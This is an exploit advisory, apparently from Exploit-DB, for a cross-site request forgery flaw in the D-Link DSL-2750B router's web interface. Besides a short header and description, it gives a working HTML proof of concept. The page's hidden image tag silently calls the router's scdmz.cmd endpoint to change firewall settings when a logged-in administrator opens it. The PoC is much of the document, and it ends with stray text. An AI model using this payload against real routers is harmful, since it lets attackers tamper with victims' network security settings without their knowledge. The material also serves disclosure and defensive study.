D-Link DSL-2750B ADSL Route' - Cross-Site Request Forgery

EDB-ID:

31569

CVE:





Platform:

Hardware

Date:

2014-02-11


# Exploit Title : D-Link DSL-2750B (ADSL Router) CSRF Vulnerability
# Date : 10-02-2014
# Author : killall-9@mail.com
# Vendor site : http://www.d-link.com
# Version : DSL-2750B 
# Tested on : Firmware Version: EU_2.02; Hardware Version: B1

The D-Link DSL-2750B's web interface (listening on tcp/ip port 80) is prone to CSRF vulnerabilities which allows to change router parameters.

POC=>

<html lang="en">
<head>
<title>Pinata-CSRF-poc for D-Link</title>
</head>
<body>
<img src="http://192.168.1.1/scdmz.cmd?&fwFlag=50853375&dosenbl=1" />
</body>
</html>

cincin°°°